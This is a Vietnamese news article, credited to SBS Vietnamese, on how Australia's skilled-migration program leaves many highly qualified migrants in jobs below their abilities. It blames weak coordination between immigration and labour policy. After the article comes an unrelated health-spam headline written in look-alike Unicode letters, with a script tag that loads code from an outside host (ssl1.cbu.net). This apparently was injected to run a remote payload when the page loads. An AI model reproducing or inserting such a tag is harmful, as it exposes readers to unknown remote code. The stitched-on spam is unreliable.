RSS

Nước Úc đang lãng phí những di dân có tay nghề cao

12:00 27/04/2018

Có tới 40% trong số di dân của những năm gần đây có trình độ học vấn cao vượt mức cần thiết, gấp 4 lần số những người Úc bản xứ. Điều này đã làm cho họ khó có thể tìm được một công việc phù hợp với năng lực và bằng cấp của mình.

Hệ thống di dân tay nghề đã thu hút hàng trăm ngàn những lao động có trình độ cao từ khắp nơi trên thế giới đổ về Úc từ năm 1988. Tuy nhiên, tác dụng phụ của những chính sách này đó là việc phí phạm nguồn lao động có trình độ cao. 

Vấn đề nằm ở việc thiếu sự phối hợp giữa chính sách về việc làm và chương trình di dân của Úc. Chương trình di dân này vốn được sử dụng để thu hút người nước ngoài và đưa vào thị trường lao động nơi mà những ngành nghề đang thiếu hụt nhân lực. Thế nhưng những chính sách việc làm lại không chú trọng vào việc sử dụng hiệu quả nguồn lao động di dân này. 

Kết quả là chúng ta vẫn liên tục thiếu hụt nhân lực có kỹ năng, và những lao động di dân lại không được đưa vào làm những vị trí đó. Điều này thường xuyên xảy ra do họ không có những kinh nghiệm thực tế khi làm việc tại Úc. 

Đây không chỉ là vấn đề cá nhân của những di dân – những người đang làm các công việc dưới khả năng của họ, mà còn là vấn đề của cả xã hội Úc. Chính phủ cũng vì vậy mà thu về ít thuế hơn hẳn việc họ để lao động di dân làm các vị trí đó và đóng thuế. Điều này có tác động lớn đến nguồn tài trợ cho cộng đồng, tiết kiệm, chi tiêu cũng như là các khoảng đầu tư công. 

Chương trình di di dân có tay nghề ưu tiên chọn những di dân có nhân thân đặc biệt, trẻ, có trình độ đại học và sử dụng tiếng Anh tốt. Úc vẫn nhận những di dân nào không có những ưu điểm trên, vốn thuộc vào dòng di dân không tác động trực tiếp vào nên kinh tế, ví dụ như di dân theo diện đoàn tụ gia đình hoặc thị thực nhân đạo. 

Hệ thống hiện tại có thể dẫn đến việc không đồng đều giữa những kỹ năng có sẵn trên thị trường và những kỹ năng mà người chủ lao động thực sự cần. Một trong những lý do khả dĩ là việc chênh lệch giữa thời điểm chủ lao động thông báo cho cơ quan quản lý di dân về những kỹ năng mà họ cần nhất (hoặc dự kiến sẽ cần trong tương lai), và có thể mất tới vài năm sau đó, di dân có tay nghề đó mới tham gia vào thị trường lao động. 

Để giảm sự chênh lệch này cần sự phối hợp chặt chẽ giữa những chính sách về di dân và chính sách lao động. Điều này hoàn toàn trái ngược với tình hình hiện tại. 

Chính sách của chương trình di dân tay nghề ở Úc hiện tại dựa vào những thông báo từ bên chủ lao động (những người phúc trình lên họ đang cần những kỹ năng nào), nhưng cuối cùng lại chỉ chú trọng vào việc quản lý dân số. Trong khi đó việc những di dân có tìm được công việc phù hợp với năng lực của họ một cách tốt nhất hay không, lại chịu sự quản lý từ một bộ phận khác của chính phủ.

Không có một nhà tuyển dụng nào tại Úc đi tiên phong trong việc để những di dân mới sang tham gia vào thị trường lao động để tích lũy những kinh nghiệm cần thiết. Đặc biệt là đối với các ngành nghề chuyên môn cần phải được cấp giấy phép. Ví dụ như, di dân khi được phép sang Úc rồi, nhưng lại không có cơ hội để làm việc và tích lũy kinh nghiệm tại Úc, họ buộc phải hoãn dự định tham gia vào ngành nghề mà họ mong muốn, hoặc phải chọn một ngành khác. 

Sự phối hợp giữa các chính sách di trú và lao động là rất cần thiết để giải quyết một số vấn đề về việc lãng phí tay nghề. Ví dụ như, có thể đem so sánh các số liệu về kết quả việc làm của những di dân gần đây và thông tin được cung cấp bởi chủ lao động về những kỹ năng đang thiếu. Việc này cần sự phối hợp từ cả hai phía di trú và lao động. 

Không những thế, việc này còn giúp chỉ ra được những trường hợp đáng quan tâm đối với di dân có trình độ học vấn vượt mức cần thiết. Đồng thời phải tìm ra được những nguyên do (có phải là do có quá nhiều di dân tay nghề, những kỹ năng không có chất lượng, hoặc việc thiếu hụt nhu cầu), cũng như đề ra phương án để cải thiện. 

Khi sử dụng những số liệu nói trên, những chính sách về di trú Úc và chính sách lao động có thể đặt ra những mục tiêu liên quan tới vấn đề kỹ năng của di dân, giúp cân bằng lại tình hình hiện tại cũng như hướng chính sách đến việc sử dụng nguồn nhân lực sẵn có một cách hiệu quả nhất. Điều này cũng giúp tạo nên tính cạnh tranh cao trong thị trường quốc tê khi sử dụng những lao động có trình độ cao. 

Kể từ năm 1988, khi hệ thống tính điểm được đưa vào áp dụng, Úc đã đi đầu trong các chính sách về di trú phù hợp với nhu cầu của thị trường lao động. Các chính sách di trú đã chú trọng vào việc thu hút các di dân có thể làm việc ngay.

Tuy nhiên, những bằng chứng cho thấy việc chúng ta đang lãng phí rất nhiều các kỹ năng, tương tự như một số nước khác không thực hiện chính sách di dân có chọn lọc. 

Điều này cho thấy chính sách di dân không phải là công cụ duy nhất chịu trách nhiệm cho việc bảo đảm các đầu ra cho thị trường lao động, mà phải có sự phối hợp giữa di trú và lao động khi cần thiết, để sử dụng những di dân tay nghề một cách hiệu quả nhất. 

Theo SBS Vietnamese

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.